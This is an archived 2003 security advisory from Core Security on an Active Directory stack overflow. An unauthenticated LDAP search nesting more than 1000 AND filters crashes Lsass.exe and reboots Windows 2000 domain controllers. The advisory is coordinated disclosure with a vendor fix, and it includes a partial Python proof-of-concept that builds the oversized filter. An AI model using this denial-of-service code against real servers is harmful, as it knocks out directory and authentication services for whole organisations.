what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

core.active.txt

core.active.txt
Posted Jul 4, 2003
Authored by Eduardo Arias, Gabriel Becedillas, Ricardo Quesada, Damian Saura | Site coresecurity.com

Core Security Technologies Advisory ID: CORE-2003-0305-03 - The Microsoft Active Directory functionality is remotely and locally vulnerable to a stack overflow that allows an attacker to crash and force a reboot of any Windows 2000 server. Vulnerable package: Windows 2000 Server with Active Directory SP3. Fixed with Service Pack 4.

tags | exploit, overflow
systems | windows
SHA-256 | afedd8c7f809a694f9bb53497d9c62835d5aef2a503c9fd6108f9274b8cd15f5

core.active.txt

Change Mirror Download
                         Core Security Technologies Advisory
http://www.coresecurity.com

Active Directory Stack Overflow


Date Published: 2003-07-02

Last Update: 2003-07-02

Advisory ID: CORE-2003-0305-03

Bugtraq ID: 7930

CVE Name: None currently assigned.

Title: Active Directory Stack Overflow

Class: Boundary Error Condition

Remotely Exploitable: Yes

Locally Exploitable: Yes

Advisory URL:
http://www.coresecurity.com/common/showdoc.php?idx=351&idxseccion=10

Vendors contacted:
- Microsoft
. Core Notification: 2003-05-16
. Notification acknowledged by Microsoft: 2003-05-19
. Issue fixed in Windows 2000 Service Pack 4: 2003-06-26

Release Mode: COORDINATED RELEASE


*Vulnerability Description:*

Active Directory, which is an essential component of the Windows 2000
architecture, presents organizations with a directory service designed
for distributed computing environments. Active Directory allows organizations
to centrally manage and share information on network resources and users
while acting as the central authority for network security.

The directory services provided by Active Directory are based on the
Lightweight Directory Access Protocol (LDAP) and thus Active Directory
objects can be stored and retrieved using the LDAP protocol.

A vulnerability in Active Directory allows an attacker to crash and force
a reboot of any Windows 2000 Server running the Active Directory service.

The vulnerability can be triggered when an LDAP version 3 search request
with more than 1000 "AND" statements is sent to the server, resulting in a
stack overflow and subsequent crash of the Lsaas.exe service.

This in turn, will force a domain controller to stop responding, thus
making possible a denial of service attack against it. The LDAP request
does not need to be authenticated.

The possibility of exploiting this vulnerability to execute arbitrary code
on a vulnerable server has not been proved but is not discarded.


*Vulnerable Packages:*

Windows 2000 Server with Active Directory (Service Pack 3).


*Solution/Vendor Information/Workaround:*

This issue is fixed in Windows 2000 Service Pack 4, which can be
donwloaded from:
http://www.microsoft.com/Windows2000/downloads/servicepacks/sp4/

Further information about the vulnerability can be obtained from
http://support.microsoft.com/default.aspx?kbid=319709


*Credits:*

This vulnerability was found by Eduardo Arias, Gabriel Becedillas, Ricardo
Quesada and Damian Saura from Core Security Technologies during Bugweek 2003
(March 3-7, 2003).


*Technical Description - Exploit/Concept Code:*

A 'search request' created using LDAP version 3, constructed with more than
1000 "AND"s, will provoke a stack overflow, making the Lsass.exe service crash
and rebooting the machine within 30 seconds.

To reproduce the stack overflow, you need to create a 'search request' to
an Active Directory server. The 'search request' must search for a non existent
machine within the Domain Controller that you've previously bind to.

It must be composed with more than 1000 AND statements but it is supposed that
OR, GE, LE and other binary operators will yield the same results.

Example of a Python script that creates such a request:

------------------------------------
class ActiveDirectoryDOS( Ldap ):

def __init__(self):
self._s = None
self.host = '192.168.0.1'
self.basedn = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com'
self.port = 389
self.buffer = ''
self.msg_id = 1
Ldap.__init__()

def generateFilter_BinaryOp( self, filter ):
filterBuffer = asn1.OCTETSTRING(filter[1]).encode() + asn1.OCTETSTRING(filter[2]).encode()
filterBuffer = self.encapsulateHeader( filter[0], filterBuffer )
return filterBuffer

def generateFilter_RecursiveBinaryOp( self, filter, numTimes):
simpleBinOp = self.generateFilter_BinaryOp( filter )
filterBuffer = simpleBinOp
for cnt in range( 0, numTimes ):
filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND, filterBuffer + simpleBinOp )
return filterBuffer


def searchSub( self, filterBuffer ):

self.bindRequest()
self.searchRequest( filterBuffer )

def run(self, host = '', basedn = '', name = '' ):

# the machine must not exist
machine_name = 'xaxax'

filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUALITY,'name',machine_name)

# execute the anonymous query
print 'executing query'
filterBuffer = self.generateFilter_RecursiveBinaryOp( filterComputerNotInDir, 7000 )
self.searchSub( filterBuffer )

------------------------------------


*About Core Security Technologies*

Core Security Technologies develops strategic security solutions for
Fortune 1000 corporations, government agencies and military
organizations. The company offers information security software and
services designed to assess risk and protect and manage information
assets.
Headquartered in Boston, MA, Core Security Technologies can be reached
at 617-399-6980 or on the Web at http://www.coresecurity.com.

To learn more about CORE IMPACT, the first comprehensive penetration
testing framework, visit:
http://www.coresecurity.com/products/coreimpact


*DISCLAIMER:*

The contents of this advisory are copyright (c) 2003 CORE Security
Technologies and may be distributed freely provided that no fee is
charged for this distribution and proper credit is given.

$Id: ActiveDirectory-advisory.txt,v 1.9 2003/07/02 15:45:46 carlos Exp $


Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close